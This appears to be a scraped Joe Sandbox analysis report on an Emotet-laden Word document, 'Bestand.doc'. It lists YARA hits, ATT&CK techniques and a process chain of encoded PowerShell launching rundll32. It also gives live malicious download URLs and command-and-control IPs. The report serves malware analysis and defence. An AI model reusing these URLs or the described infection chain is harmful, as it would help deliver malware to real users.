                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007D46 GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,QueryPerformanceCounter,7_2_10007D46
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 0000000D.00000002.2103170019.0000000000221000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2110963948.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2099512002.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2106608092.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2097844811.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2110599101.0000000000211000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2105544671.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2096635547.0000000000221000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2341761700.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2101952282.00000000002C1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2105601376.0000000000211000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2103080686.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2110533046.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2096612439.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2110998210.0000000000211000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2099552528.0000000000251000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2100964002.00000000002D1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2098980384.00000000007A1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2101819334.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2095079967.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2106652050.00000000001D1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2100913831.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2104289141.0000000000211000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2104205195.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 10.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.2c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.6f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.6a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.2b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.6c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.2b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.2b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.6a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.2d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.7a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.2b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection111Disable or Modify Tools1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScripting32Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information3LSASS MemoryFile and Directory Discovery3Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsNative API1Logon Script (Windows)Logon Script (Windows)Scripting32Security Account ManagerSystem Information Discovery26SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsExploitation for Client Execution3Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSSecurity Software Discovery31Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCommand and Scripting Interpreter211Network Logon ScriptNetwork Logon ScriptMasquerading11LSA SecretsVirtualization/Sandbox Evasion2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaPowerShell3Rc.commonRc.commonVirtualization/Sandbox Evasion2Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection111DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobHidden Files and Directories1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Rundll321/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 337085 Sample: Bestand.doc Startdate: 07/01/2021 Architecture: WINDOWS Score: 100 55 Multi AV Scanner detection for domain / URL 2->55 57 Antivirus detection for URL or domain 2->57 59 Multi AV Scanner detection for submitted file 2->59 61 13 other signatures 2->61 14 cmd.exe 2->14         started        17 WINWORD.EXE 293 27 2->17         started        process3 signatures4 75 Suspicious powershell command line found 14->75 77 Very long command line found 14->77 79 Encrypted powershell cmdline option found 14->79 81 PowerShell case anomaly found 14->81 19 powershell.exe 12 9 14->19         started        22 msg.exe 14->22         started        process5 dnsIp6 47 seo.udaipurkart.com 103.92.235.25, 49170, 80 ZINIOSS-AS-INZiniosInformationTechnologyPvtLtdIN India 19->47 49 hangarlastik.com 89.252.164.58, 49167, 80 NETINTERNETNetinternetBilisimTeknolojileriASTR Turkey 19->49 51 2 other IPs or domains 19->51 24 rundll32.exe 19->24         started        process7 process8 26 rundll32.exe 15 24->26         started        signatures9 69 Hides that the sample has been downloaded from the Internet (zone.identifier) 26->69 29 rundll32.exe 5 26->29         started        process10 signatures11 73 Hides that the sample has been downloaded from the Internet (zone.identifier) 29->73 32 rundll32.exe 5 29->32         started        process12 signatures13 53 Hides that the sample has been downloaded from the Internet (zone.identifier) 32->53 35 rundll32.exe 5 32->35         started        process14 signatures15 63 Hides that the sample has been downloaded from the Internet (zone.identifier) 35->63 38 rundll32.exe 5 35->38         started        process16 signatures17 65 Hides that the sample has been downloaded from the Internet (zone.identifier) 38->65 41 rundll32.exe 5 38->41         started        process18 signatures19 67 Hides that the sample has been downloaded from the Internet (zone.identifier) 41->67 44 rundll32.exe 5 41->44         started        process20 signatures21 71 Hides that the sample has been downloaded from the Internet (zone.identifier) 44->71

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Bestand.doc61%VirustotalBrowse

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      12.2.rundll32.exe.2c0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      16.2.rundll32.exe.1d0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      10.2.rundll32.exe.250000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      19.2.rundll32.exe.6f0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      17.2.rundll32.exe.210000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      13.2.rundll32.exe.220000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      18.2.rundll32.exe.210000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      8.2.rundll32.exe.220000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      7.2.rundll32.exe.6c0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      15.2.rundll32.exe.210000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      11.2.rundll32.exe.2d0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      9.2.rundll32.exe.7a0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      14.2.rundll32.exe.210000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                      Domains

                      SourceDetectionScannerLabelLink
                      sarture.com2%VirustotalBrowse
                      hangarlastik.com6%VirustotalBrowse
                      seo.udaipurkart.com6%VirustotalBrowse
                      padreescapes.com1%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://hangarlastik.com/cgi-sys/suspendedpage.cgi2%VirustotalBrowse
                      http://hangarlastik.com/cgi-sys/suspendedpage.cgi0%Avira URL Cloudsafe
                      http://padreescapes.com1%VirustotalBrowse
                      http://padreescapes.com0%Avira URL Cloudsafe
                      http://5.2.136.90/1b05ye92bd1jr3/zyv623ztls/15s4sj3gl56q/0%Avira URL Cloudsafe
                      http://hangarlastik.comp0%Avira URL Cloudsafe
                      http://hangarlastik.com0%Avira URL Cloudsafe
                      https://brettshawmagic.com/content/Y/100%Avira URL Cloudmalware
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://hangarlastik.com/cgi-bin/Ui4n/100%Avira URL Cloudmalware
                      https://cafecentral.vincoorbisdev.com/wp-admin/VZX9BU/100%Avira URL Cloudmalware
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://sarture.com/wp-includes/JD8/100%Avira URL Cloudmalware
                      http://sarture.com0%Avira URL Cloudsafe
                      http://padreescapes.com/blog/0I/0%Avira URL Cloudsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://seo.udaipurkart.com/rx-5700-6hnr7/Sgms/100%Avira URL Cloudmalware
                      http://seo.udaipurkart.com0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      sarture.com
                      		173.255.195.246
                      		truetrueunknown
                      hangarlastik.com
                      		89.252.164.58
                      		truetrueunknown
                      seo.udaipurkart.com
                      		103.92.235.25
                      		truetrueunknown
                      padreescapes.com
                      		66.153.205.191
                      		truetrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://hangarlastik.com/cgi-sys/suspendedpage.cgitrue
                      • 2%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://5.2.136.90/1b05ye92bd1jr3/zyv623ztls/15s4sj3gl56q/true
                      • Avira URL Cloud: safe
                      		unknown
                      http://hangarlastik.com/cgi-bin/Ui4n/true
                      • Avira URL Cloud: malware
                      		unknown
                      http://sarture.com/wp-includes/JD8/true
                      • Avira URL Cloud: malware
                      		unknown
                      http://padreescapes.com/blog/0I/true
                      • Avira URL Cloud: safe
                      		unknown
                      http://seo.udaipurkart.com/rx-5700-6hnr7/Sgms/true
                      • Avira URL Cloud: malware
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.windows.com/pctv.rundll32.exe, 0000000D.00000002.2104055243.0000000002010000.00000002.00000001.sdmpfalse
                        		high
                        http://investor.msn.comrundll32.exe, 00000006.00000002.2097659737.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095270294.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097228304.0000000002020000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2099371824.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2104055243.0000000002010000.00000002.00000001.sdmpfalse
                          		high
                          http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000006.00000002.2097659737.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095270294.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097228304.0000000002020000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2099371824.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2104055243.0000000002010000.00000002.00000001.sdmpfalse
                            		high
                            http://padreescapes.compowershell.exe, 00000005.00000002.2098035314.0000000003B3A000.00000004.00000001.sdmptrue
                            • 1%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            http://hangarlastik.comppowershell.exe, 00000005.00000002.2098001005.0000000003B1D000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://hangarlastik.compowershell.exe, 00000005.00000002.2097223327.0000000003784000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            https://brettshawmagic.com/content/Y/powershell.exe, 00000005.00000002.2097223327.0000000003784000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000006.00000002.2098909375.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095548608.0000000002067000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097503957.0000000002207000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.hotmail.com/oerundll32.exe, 00000006.00000002.2097659737.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095270294.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097228304.0000000002020000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2099371824.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2104055243.0000000002010000.00000002.00000001.sdmpfalse
                              		high
                              http://www.piriform.com/ccleapowershell.exe, 00000005.00000002.2092843138.0000000000374000.00000004.00000020.sdmpfalse
                                		high
                                https://cafecentral.vincoorbisdev.com/wp-admin/VZX9BU/powershell.exe, 00000005.00000002.2097223327.0000000003784000.00000004.00000001.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000006.00000002.2098909375.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095548608.0000000002067000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097503957.0000000002207000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.icra.org/vocabulary/.rundll32.exe, 00000006.00000002.2098909375.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095548608.0000000002067000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097503957.0000000002207000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000005.00000002.2094377918.0000000002390000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2096621734.00000000028B0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2099765117.00000000027F0000.00000002.00000001.sdmpfalse
                                    		high
                                    http://investor.msn.com/rundll32.exe, 00000006.00000002.2097659737.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095270294.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097228304.0000000002020000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2099371824.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2104055243.0000000002010000.00000002.00000001.sdmpfalse
                                      		high
                                      http://sarture.compowershell.exe, 00000005.00000002.2098035314.0000000003B3A000.00000004.00000001.sdmptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.piriform.com/ccleanerpowershell.exe, 00000005.00000002.2092873286.00000000003C1000.00000004.00000020.sdmpfalse
                                        		high
                                        http://www.%s.comPApowershell.exe, 00000005.00000002.2094377918.0000000002390000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2096621734.00000000028B0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2099765117.00000000027F0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2101892214.00000000027A0000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		low
                                        http://seo.udaipurkart.compowershell.exe, 00000005.00000002.2098035314.0000000003B3A000.00000004.00000001.sdmptrue
                                        • Avira URL Cloud: safe
                                        		unknown

                                        Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public

                                        IPDomainCountryFlagASNASN NameMalicious
                                        89.252.164.58
                                        		unknownTurkey
                                        		51559NETINTERNETNetinternetBilisimTeknolojileriASTRtrue
                                        173.255.195.246
                                        		unknownUnited States
                                        		63949LINODE-APLinodeLLCUStrue
                                        5.2.136.90
                                        		unknownRomania
                                        		8708RCS-RDS73-75DrStaicoviciROtrue
                                        103.92.235.25
                                        		unknownIndia
                                        		138251ZINIOSS-AS-INZiniosInformationTechnologyPvtLtdINtrue
                                        66.153.205.191
                                        		unknownUnited States
                                        		21565AS21565UStrue

                                        General Information

                                        Joe Sandbox Version:31.0.0 Red Diamond
                                        Analysis ID:337085
                                        Start date:07.01.2021
                                        Start time:18:35:17
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 10m 30s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Sample file name:Bestand.doc
                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                        Number of analysed new started processes analysed:21
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • GSI enabled (VBA)
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.expl.evad.winDOC@34/8@4/5
                                        EGA Information:Failed
                                        HDC Information:
                                        • Successful, ratio: 93.4% (good quality ratio 89.9%)
                                        • Quality average: 74.9%
                                        • Quality standard deviation: 25.4%
                                        HCA Information:
                                        • Successful, ratio: 94%
                                        • Number of executed functions: 197
                                        • Number of non-executed functions: 91
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        • Found application associated with file extension: .doc
                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                        • Found warning dialog
                                        • Click Ok
                                        • Attach to Office via COM
                                        • Scroll down
                                        • Close Viewer
                                        Warnings:
                                        Show All
                                        • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        18:35:38API Interceptor1x Sleep call for process: msg.exe modified
                                        18:35:39API Interceptor42x Sleep call for process: powershell.exe modified
                                        18:35:44API Interceptor965x Sleep call for process: rundll32.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        89.252.164.58arc-NZY886292.docGet hashmaliciousBrowse
                                        • hangarlastik.com/cgi-bin/Ui4n/
                                        5.2.136.90dat_513543.docGet hashmaliciousBrowse
                                        • 5.2.136.90/04rd/6w3hm75k6ju730vl/l0qiyvbr6/vmtc1/bd9090pvenbvbzuu/
                                        PACK.docGet hashmaliciousBrowse
                                        • 5.2.136.90/6d6v7rdk92yimvk/99aw7ok625toqmkhj7c/
                                        pack 2254794.docGet hashmaliciousBrowse
                                        • 5.2.136.90/76cxdz6xxj/u15u3hf6xq6us/0vtcgy/tltp48/51u1dif1fy5wlgpgf/
                                        DATA-480841.docGet hashmaliciousBrowse
                                        • 5.2.136.90/6tycsc/
                                        Documenten_9274874 8574977265.docGet hashmaliciousBrowse
                                        • 5.2.136.90/gv38bn75mnjox2y/c6b9ni4/vj3ut3/kld53/bp623/r5qw7a8y6jtlf9qu/
                                        pack-91089 416755919.docGet hashmaliciousBrowse
                                        • 5.2.136.90/9ormjijma/sd2xibclmrp5oftlrxf/
                                        Adjunto.docGet hashmaliciousBrowse
                                        • 5.2.136.90/nmjn7tw17/z6mjkdfb6xb/85tf0qh6u/bqo6i0tmr9bo/
                                        arc-NZY886292.docGet hashmaliciousBrowse
                                        • 5.2.136.90/zpm1364ks766bq5tfgm/of4c87wiptl9gmt2iai/xi3tkrikfkjmyw07j7s/8758g9rolh/96kjwl7hgnpltacdm2/gdi8d56ispt49sa36ql/
                                        NQN0244_012021.docGet hashmaliciousBrowse
                                        • 5.2.136.90/xgyqftp8/ypox5kzx24gfln5utkh/ejrffzc54r5vq/itkmc/prx4/
                                        4560 2021 UE_9893.docGet hashmaliciousBrowse
                                        • 5.2.136.90/tqndp5p5qacps4njp6/p6z0bktcdw7ja/i1rph/
                                        Scan-0767672.docGet hashmaliciousBrowse
                                        • 5.2.136.90/7hs0yieqcvglex40v9/th111ygicc1htiecx/eto0vvprampeftpmcc/
                                        Documento-2021.docGet hashmaliciousBrowse
                                        • 5.2.136.90/n5z35/rncfyghpt3nn9/twyyh8xn/dm5hb/
                                        informazioni-0501-012021.docGet hashmaliciousBrowse
                                        • 5.2.136.90/kcdo20u2bqptv6/
                                        rapport 40329241.docGet hashmaliciousBrowse
                                        • 5.2.136.90/6s0p53atjr9ihwygvd/svxo4o84aueyhj9v5m/5lqp30jb/g0ur1kwrzvgj3o0gmmo/dw8my2m1fzzo/
                                        info_39534.docGet hashmaliciousBrowse
                                        • 5.2.136.90/5ciqo/dhqbj3xw/
                                        Dati_012021_688_89301.docGet hashmaliciousBrowse
                                        • 5.2.136.90/l7tybna/g7nyjudv6/gf8bykzqxpzupj/wr2o0u8id88pf7dgmx3/9zupu1q7mb/wtjo6ov5niso7jo0n/
                                        2199212_20210105_160680.docGet hashmaliciousBrowse
                                        • 5.2.136.90/vcpu82n/rvhhoco3em4jtl/qxey084opeuhirghxzs/bm8x5w07go1ogzflbv/32imx8ryeb30/bd7tg46kn/
                                        ARCHIVO_FILE.docGet hashmaliciousBrowse
                                        • 5.2.136.90/ji02pdi/39rfb96opn/
                                        doc_X_13536.docGet hashmaliciousBrowse
                                        • 5.2.136.90/glhz448zi9act/ieva/q040/sl9198fns4q2/
                                        REP380501 040121.docGet hashmaliciousBrowse
                                        • 5.2.136.90/09hsu3aavqd4/8opns7c/oxp5fp7awb/

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        hangarlastik.comarc-NZY886292.docGet hashmaliciousBrowse
                                        • 89.252.164.58

                                        ASN

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        RCS-RDS73-75DrStaicoviciROdat_513543.docGet hashmaliciousBrowse
                                        • 5.2.136.90
                                        PACK.docGet hashmaliciousBrowse
                                        • 5.2.136.90
                                        pack 2254794.docGet hashmaliciousBrowse
                                        • 5.2.136.90
                                        DATA-480841.docGet hashmaliciousBrowse
                                        • 5.2.136.90
                                        Documenten_9274874 8574977265.docGet hashmaliciousBrowse
                                        • 5.2.136.90
                                        pack-91089 416755919.docGet hashmaliciousBrowse
                                        • 5.2.136.90
                                        Adjunto.docGet hashmaliciousBrowse
                                        • 5.2.136.90
